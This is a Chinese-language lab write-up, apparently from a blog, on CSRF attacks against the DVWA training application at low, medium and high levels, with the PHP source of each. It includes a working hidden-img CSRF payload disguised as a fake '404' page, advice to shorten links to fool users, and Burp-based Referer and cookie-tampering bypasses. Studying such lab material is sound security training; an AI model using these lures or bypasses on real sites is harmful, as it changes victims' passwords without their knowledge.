CSRF

CSRF，跨站域請求偽造，通常攻擊者會偽造一個場景（例如一條鏈接），來誘使用戶點擊，用戶一旦點擊，黑客的攻擊目的也就達到了，他可以盜用你的身份，以你的名義發(fā)送惡意請求。CSRF攻擊的關(guān)鍵就是利用受害者的cookie向服務(wù)器發(fā)送偽造請求。

和XSS有什么不同？

CSRF是以用戶的權(quán)限去做事情，自己本身并沒有獲取到權(quán)限；XSS是直接盜取了用戶的權(quán)限進行攻擊。

LOW級別

源碼分析

<?phpif( isset( $_GET[ 'Change' ] ) ) {// Get input$pass_new  = $_GET[ 'password_new' ];$pass_conf = $_GET[ 'password_conf' ];// Do the passwords match?if( $pass_new == $pass_conf ) {// They do!$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update the database$current_user = dvwaCurrentUser();$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . $current_user . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for the userecho "<pre>Password Changed.</pre>";}else {// Issue with passwords matchingecho "<pre>Passwords did not match.</pre>";}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}?> 

發(fā)現(xiàn)只是坐了密碼比對，并沒有其他認證，只需要輸入的新密碼和確認的新密碼保持一致即可

New password：123456

Confirm new password：123456

將地址欄中的兩個密碼改成123

同樣可以修改成功

修改密碼的鏈接過于明顯，可以使用一些縮短鏈接的方法，這樣用戶更容易上當。

也可以寫一個html簡單腳本，把img標簽隱藏起來

<img src="http://192.168.80.145/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;">
<h1>404
</h1>
<h2>file not found!!
</h2>

當用戶點擊訪問這個頁面時，會以為訪問的頁面丟失了，但是當他打開這個頁面時，用戶的密碼已經(jīng)被修改了！

Medium級別

源碼分析

<?phpif( isset( $_GET[ 'Change' ] ) ) {// Checks to see where the request came fromif( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {// Get input$pass_new  = $_GET[ 'password_new' ];$pass_conf = $_GET[ 'password_conf' ];// Do the passwords match?if( $pass_new == $pass_conf ) {// They do!$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$pass_new = md5( $pass_new );// Update the database$current_user = dvwaCurrentUser();$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . $current_user . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );// Feedback for the userecho "<pre>Password Changed.</pre>";}else {// Issue with passwords matchingecho "<pre>Passwords did not match.</pre>";}}else {// Didn't come from a trusted sourceecho "<pre>That request didn't look correct.</pre>";}((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}?> 

stripos() 函數(shù)查找字符串在另一字符串中第一次出現(xiàn)的位置（不區(qū)分大小寫）代碼檢查了保留變量HTTP_REFERER （http包頭部的Referer字段的值，表示來源地址）是否包含SERVER_NAME（http包頭部的 Host 字段表示要訪問的主機名）。

 if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )`
這里通過STRIPOS函數(shù)對比HTTP_REFERER，SERVER_NAME是否一致
后臺的服務(wù)器會去檢查HTTP_REFERER函數(shù)是否包含SERVER_NAME(host參數(shù)、主機名等)，用此方法來抵御CSRF攻擊
# 方法：
要想通過驗證，就必須保證在Http請求中Referer字段中必須包含Host，所以攻擊者只需要將文件名改成受害者的Host以及name就可以完美通過驗證！

---

使用burp suit抓包 發(fā)送到Repeater

將Host與Referer修改一致

High級別

<?php$change = false;
$request_type = "html";
$return_message = "Request Failed";if ($_SERVER['REQUEST_METHOD'] == "POST" && array_key_exists ("CONTENT_TYPE", $_SERVER) && $_SERVER['CONTENT_TYPE'] == "application/json") {$data = json_decode(file_get_contents('php://input'), true);$request_type = "json";if (array_key_exists("HTTP_USER_TOKEN", $_SERVER) &&array_key_exists("password_new", $data) &&array_key_exists("password_conf", $data) &&array_key_exists("Change", $data)) {$token = $_SERVER['HTTP_USER_TOKEN'];$pass_new = $data["password_new"];$pass_conf = $data["password_conf"];$change = true;}
} else {if (array_key_exists("user_token", $_REQUEST) &&array_key_exists("password_new", $_REQUEST) &&array_key_exists("password_conf", $_REQUEST) &&array_key_exists("Change", $_REQUEST)) {$token = $_REQUEST["user_token"];$pass_new = $_REQUEST["password_new"];$pass_conf = $_REQUEST["password_conf"];$change = true;}
}if ($change) {// Check Anti-CSRF tokencheckToken( $token, $_SESSION[ 'session_token' ], 'index.php' );// Do the passwords match?if( $pass_new == $pass_conf ) {// They do!$pass_new = mysqli_real_escape_string ($GLOBALS["___mysqli_ston"], $pass_new);$pass_new = md5( $pass_new );// Update the database$current_user = dvwaCurrentUser();$insert = "UPDATE `users` SET password = '" . $pass_new . "' WHERE user = '" . $current_user . "';";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert );// Feedback for the user$return_message = "Password Changed.";}else {// Issue with passwords matching$return_message = "Passwords did not match.";}mysqli_close($GLOBALS["___mysqli_ston"]);if ($request_type == "json") {generateSessionToken();header ("Content-Type: application/json");print json_encode (array("Message" =>$return_message));exit;} else {echo "<pre>" . $return_message . "</pre>";}
}// Generate Anti-CSRF token
generateSessionToken();?> 

---

---

直接修改cook的安全等級繞過token認證機制

Burp Suite抓包，發(fā)送到Repeater

安全等級修改為low

---